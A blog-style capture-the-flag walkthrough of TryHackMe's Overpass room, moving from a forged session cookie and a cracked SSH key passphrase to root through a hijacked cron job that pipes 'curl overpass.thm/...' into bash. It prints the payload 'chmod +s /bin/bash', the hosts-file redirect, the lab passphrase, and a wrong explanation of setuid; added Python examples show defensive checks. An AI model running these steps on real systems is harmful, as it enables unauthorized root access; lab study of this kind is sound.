TryHackMe’s Overpass Level1

Jatin Batish
6 min read · Dec 16, 2020

Boot2Root challenge: Capture the normal and superuser’s flag.

Overpass is a series of rooms on web application penetration testing and is really beginner friendly. It covers basic web vulnerabilities, basic cryptography, password cracking and source code review.

So let's get started...

I got the machine's IP as 10.10.193.124.

So, start with the basic enumeration: nmap, nikto, etc.

Nmap is a great tool for scanning the machine, so:

NMAP scan result

I didn't include ‘-p-’ because these are the only two ports open on the machine. (I already knew this, because I solved it before writing this!)

The interesting thing here is on port 80: the web server is written in Go, which we don't see that often. I opened the machine in my browser (10.10.193.124) and it shows:

WELCOME PAGE

Here I started my manual enumeration. The site offers the binaries and the source code for download.

I downloaded the Linux binary, the source code and the build script to analyze and review them. Give the binary execute permission before running it:

chmod 777 overpassLinux and ./overpassLinux

Trying the different options in the binary felt like walking into the devil's den, so I started to look into the source code and the .sh file instead.

I got nothing interesting in the overpass.go file, but some functions caught my attention, like the rot47 function. It clearly states that ROT47 is used somewhere!

ROT47

buildscript.sh gives an idea that a command is running with root privileges and that somehow I need to get in between as a man in the middle.

buildscript.sh

After a break, I started searching for hidden directories and files, both manually and with automated tools like DirBuster.

# Always check the page source (Ctrl+U) for hidden data or sensitive information in HTML comments.

Here I found some hidden directories through manual and automated enumeration.

Dirbuster Result

admin.html and login.js seem interesting, so let's start looking into them.

On admin.html I tried SQLi, brute forcing, etc., but nothing worked; I did learn a lot about Hydra, the online brute forcer, though.

I went for a hint, which says: OWASP Top 10, and do not brute force.

I immediately checked the OWASP Top 10 and started reviewing the login.js file.

login.js file

The login() function looked interesting and had a flaw in it.

In the line where the ‘statusOrCookie’ value is checked, the else branch sets the “SessionToken” cookie to whatever came back, with nothing in particular required of its value.

What if we set the cookie ourselves?

Yes, I can set it to anything! On refreshing the page I got the private RSA key of the user James!
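The flaw described above, modelled as an added example (this is not code from the original post or from the Overpass room): a server-side check that only tests whether a SessionToken cookie exists, beside one that verifies an HMAC-signed token with an expiry. SERVER_SECRET, the user name and the expiry are constructed demo values.

```python
"""Cookie-presence check versus real session validation.

Added example; it is not code from the original post or from the Overpass
room. A server that only asks whether a SessionToken cookie exists accepts a
cookie the visitor set themselves. The hardened variant issues HMAC-signed
tokens with an expiry and verifies them on every request. SERVER_SECRET,
the user name and the expiry are constructed demo values.
"""
import base64
import hashlib
import hmac
import json
import time

SERVER_SECRET = b"demo-secret-not-for-production"  # constructed sample value


def is_authorized_weak(cookies):
    """VULNERABLE: only checks that a SessionToken cookie is present.
    Cookies.set("SessionToken", "anything") in the browser passes this."""
    return bool(cookies.get("SessionToken"))


def mint_token(username, ttl_seconds, now=None):
    """Issue a token the client cannot forge: b64(payload).b64(HMAC-SHA256)."""
    now = time.time() if now is None else now
    payload = json.dumps({"sub": username, "exp": int(now) + ttl_seconds},
                         separators=(",", ":")).encode()
    sig = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(payload).decode() + "." +
            base64.urlsafe_b64encode(sig).decode())


def verify_token(token, now=None):
    """Return the user name if the token is authentic and unexpired, else None."""
    now = time.time() if now is None else now
    try:
        payload_b64, sig_b64 = token.split(".", 1)
        payload = base64.urlsafe_b64decode(payload_b64)
        sig = base64.urlsafe_b64decode(sig_b64)
    except (ValueError, TypeError):
        return None  # malformed token: wrong shape or bad base64
    expected = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return None  # signature mismatch (constant-time comparison)
    try:
        claims = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(claims, dict):
        return None
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= now:
        return None  # expired, or payload is not the object we issued
    return claims.get("sub")


def is_authorized(cookies, now=None):
    """HARDENED: the cookie must carry a token that verifies server-side."""
    token = cookies.get("SessionToken")
    return token is not None and verify_token(token, now) is not None


if __name__ == "__main__":
    forged = {"SessionToken": "anything"}
    print("weak check, forged cookie:    ", is_authorized_weak(forged))  # True
    print("hardened check, forged cookie:", is_authorized(forged))       # False
    genuine = {"SessionToken": mint_token("james", 3600)}
    print("hardened check, issued token: ", is_authorized(genuine))      # True
```

The point is where the decision is made: the weak check trusts the browser's statement that a session exists, while the hardened one recomputes the MAC with a secret the browser never sees, so a self-set cookie fails regardless of its value.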

It is an SSH key.

Now I need to recover the passphrase protecting this key.

John the Ripper is one of the best tools for cracking passwords.

But John doesn't accept the “rsakey” file as-is, so its format has to be converted.

John ships a script for this, ssh2john.py, in /usr/share/john.

Now I can crack the key to get the passphrase.

I used rockyou.txt from /usr/share/wordlists as John's wordlist.

password cracked!!
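Why a rockyou run against the key finishes so quickly, and how a defender can spot keys in that state, as an added example (this is not code from the original post, John the Ripper or ssh2john): a checker that classifies a PEM private key by how it is protected at rest. Legacy PEM keys (BEGIN RSA PRIVATE KEY with a DEK-Info header) derive the cipher key from the passphrase with a single MD5 pass, so each guess costs almost nothing; the newer BEGIN OPENSSH PRIVATE KEY format uses bcrypt with a tunable round count. The sample keys are constructed envelopes, not real keys.

```python
"""Classify how an SSH private key is protected at rest.

Added example, not code from the original post and not part of John the
Ripper or ssh2john. Legacy PEM keys announce encryption with a
Proc-Type/DEK-Info header and derive the cipher key with one MD5 pass;
OpenSSH-format keys carry the cipher, KDF name and bcrypt round count in
their base64 body. Both sample keys below are constructed, not real keys.
"""
import base64
import struct

LEGACY_HEADERS = ("-----BEGIN RSA PRIVATE KEY-----",
                  "-----BEGIN DSA PRIVATE KEY-----",
                  "-----BEGIN EC PRIVATE KEY-----")
OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_FOOTER = "-----END OPENSSH PRIVATE KEY-----"


def _read_string(blob, offset):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length


def classify_private_key(pem_text):
    """Return (format, protection, detail) for a PEM-encoded private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines() if ln.strip()]
    if not lines:
        return ("unknown", "unknown", "empty input")
    header = lines[0]
    if header in LEGACY_HEADERS:
        # Legacy PEM announces encryption with RFC 1421 style headers.
        if any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines[1:4]):
            dek = next((ln for ln in lines if ln.startswith("DEK-Info:")), "")
            cipher = dek.split(":", 1)[1].strip().split(",")[0] if dek else "?"
            return ("legacy-pem", "passphrase (weak KDF)",
                    cipher + ", key derived by one MD5 pass; cheap to guess")
        return ("legacy-pem", "none", "unencrypted private key")
    if header == OPENSSH_HEADER:
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            return ("openssh", "unknown", "bad magic")
        off = len(magic)
        cipher, off = _read_string(blob, off)     # e.g. aes256-ctr or none
        kdf, off = _read_string(blob, off)        # bcrypt or none
        kdfopts, off = _read_string(blob, off)    # string salt + uint32 rounds
        if cipher == b"none":
            return ("openssh", "none", "unencrypted private key")
        rounds = None
        if kdf == b"bcrypt":
            _salt, pos = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[pos:pos + 4])
        return ("openssh", "passphrase (bcrypt)",
                "%s, %s rounds=%s" % (cipher.decode(), kdf.decode(), rounds))
    return ("unknown", "unknown", header)


def build_openssh_sample(cipher, kdf, rounds):
    """Construct a minimal OpenSSH-format envelope for the demo (not a usable key)."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1)
    return "\n".join([OPENSSH_HEADER, base64.b64encode(blob).decode(), OPENSSH_FOOTER])


# Constructed legacy-format samples (headers only; the body is filler, not a key).
SAMPLE_LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""
SAMPLE_LEGACY_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in [("legacy encrypted", SAMPLE_LEGACY_ENCRYPTED),
                      ("legacy plain", SAMPLE_LEGACY_PLAIN),
                      ("openssh bcrypt", build_openssh_sample(b"aes256-ctr", b"bcrypt", 100)),
                      ("openssh plain", build_openssh_sample(b"none", b"none", 0))]:
        print(name, "->", classify_private_key(key))
```

A key the checker reports as legacy-pem with a passphrase is exactly the kind ssh2john prepares for John; re-encrypting it with ssh-keygen -p -o -a 100 (a standard ssh-keygen invocation, not a command from the post) moves it to the bcrypt format, where every guess costs 100 bcrypt rounds instead of one MD5.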

I was able to crack the passphrase and am now ready to SSH into the machine.

So I SSH'ed into the machine using this key.

Copy the key to a file named “rsakey” and run the following command:

ssh -i rsakey james@10.10.193.124 and enter ‘james13' as the passphrase.

Logged into the machine.

I got the regular user flag in user.txt .

I also cat'ed out todo.txt for hints about further steps like privilege escalation.

The phrase “automated build script working and where the builds go” is interesting, as it gave me the idea of looking for automated scripts that run on their own.

From my nmap results I knew it is a Linux-based machine, and it's time to enumerate it.

So I googled how to enumerate a Linux machine from the inside, read some other writeups and came across linpeas.sh.

So it's time to upload it to the machine.

SSH can be used for file transfer, but how? Need to google that too!

I came across the command:

scp fileinursystem user@host:/path/to/whereyouwant/thefile

And I also have the key. Therefore,

here I uploaded the file.

Now start the enumeration.

./linpeas.sh

While going through the linpeas results I came across some wonderful facts about the machine, like:

Now this seems interesting: cron is running this ‘curl’ command and piping its output into /bin/bash.

overpass.thm looks like a domain name, which I recognize from my knowledge of Active Directory.

Going further I came across the writable files, which include /etc/hosts, a file that normally only root can write.

Since curl is run by root, if we can somehow exploit it we can get root access. The curl command in the cron job uses “overpass.thm” as the hostname, and we have write access to the hosts file.

So what if we edit /etc/hosts and point overpass.thm at our IP as follows:

IP changed!!

That means we can make the cron job resolve the hostname to our IP address, so curl connects to our machine instead.

As curl fetches (domain)/downloads/src/buildscript.sh, I recreated the same directory layout on my machine.

Now, what goes into buildscript.sh?

#!/bin/bash
chmod +s /bin/bash

It means:

This command sets the “set group ID” (setgid) mode bit on the current directory. This means that all new files and subdirectories created within the current directory inherit the group ID of the directory, rather than the primary group ID of the user who created the file.

Therefore I need to host a server to receive the request. I started the server in the directory containing the “downloads” folder and began watching /bin/bash.

When curl makes the connection, setgid changes as shown!

request received and setgid gets changed!!

Now stop watching /bin/bash

and run /bin/bash -p to get the shell. Now you are root!
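The escalation above rests on three conditions that an administrator can audit for. As an added example (this is not code from the original post or from linpeas), the following checks run over constructed sample data: cron entries that pipe a download straight into a shell, a hosts file writable by non-root users so the download's hostname can be redirected, and setuid/setgid bits on a shell binary. On a regular file such as /bin/bash, `chmod +s` sets both the setuid (04000) and setgid (02000) bits (the directory inheritance described above is what setgid does on a directory); the apply_plus_s() helper shows the resulting mode. The cron lines, mode values and owner uids are constructed; on a real host they would come from the crontab files and os.stat().

```python
"""Audit the three conditions the privilege-escalation chain above relies on.

Added example; it is not code from the original post or from linpeas. It
runs on constructed sample data rather than on the live machine and checks:
  1. cron entries that pipe a download straight into a shell (curl ... | bash);
  2. a hosts file writable by users other than root, which lets the download's
     hostname be redirected;
  3. setuid/setgid bits on a shell binary, which is what `chmod +s /bin/bash`
     leaves behind and what `bash -p` then keeps.
The cron lines, mode values and owner uids below are constructed.
"""
import re
import stat

# A download tool whose output is piped into a shell interpreter.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(/bin/|/usr/bin/)?(ba|z|da|k)?sh\b")
# First URL-ish argument after curl/wget, with or without a scheme.
FETCH_HOST = re.compile(r"\b(?:curl|wget)\s+(?:-\S+\s+)*(?:https?://)?([^/\s]+)")

SHELL_BINARIES = ("/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash", "/usr/bin/zsh")


def find_pipe_to_shell(cron_lines):
    """Return (line_no, host, entry) for cron entries that pipe a fetch into a shell."""
    hits = []
    for no, line in enumerate(cron_lines, 1):
        entry = line.strip()
        if not entry or entry.startswith("#") or "=" in entry.split()[0]:
            continue  # comment or VAR=value line
        if PIPE_TO_SHELL.search(entry):
            m = FETCH_HOST.search(entry)
            hits.append((no, m.group(1) if m else None, entry))
    return hits


def hosts_file_writable_by_others(mode, owner_uid):
    """True when a hosts file (mode bits, owner uid) can be modified by non-root users."""
    return owner_uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def apply_plus_s(mode):
    """The effect of `chmod +s FILE` on a regular file: set setuid and setgid."""
    return mode | stat.S_ISUID | stat.S_ISGID


def setuid_shells(path_modes):
    """Return shell binaries in {path: mode} carrying a setuid or setgid bit."""
    return sorted(p for p, m in path_modes.items()
                  if p in SHELL_BINARIES and m & (stat.S_ISUID | stat.S_ISGID))


# Constructed sample crontab mirroring the shape of the entry found on the box.
SAMPLE_CRON = [
    "# /etc/crontab: system-wide crontab",
    "SHELL=/bin/sh",
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin",
    "17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly",
    "* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash",
]

if __name__ == "__main__":
    for no, host, entry in find_pipe_to_shell(SAMPLE_CRON):
        print("cron line %d pipes a download from %s into a shell: %s" % (no, host, entry))
    # Constructed: /etc/hosts owned by root but mode 0666 (world-writable).
    print("hosts writable by others:", hosts_file_writable_by_others(0o100666, 0))
    before = 0o100755
    after = apply_plus_s(before)
    print("chmod +s /bin/bash: %o -> %o" % (before, after))
    print("setuid/setgid shells:", setuid_shells({"/bin/bash": after, "/bin/sh": 0o100755}))
```

Each check maps to one fix: fetch scripts to disk and verify them before executing, keep /etc/hosts at mode 0644 owned by root, and alert on any setuid or setgid bit appearing on a shell, since no stock distribution ships bash that way.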

Submit both the flags.

Remember you should know how to solve all the problems which have already been solved.


Jatin Batish

Hey there! I'm a student of Punjabi University, Patiala, pursuing a B.Tech. in CSE. I'm a cybersecurity enthusiast and web application pentester! Thanks!!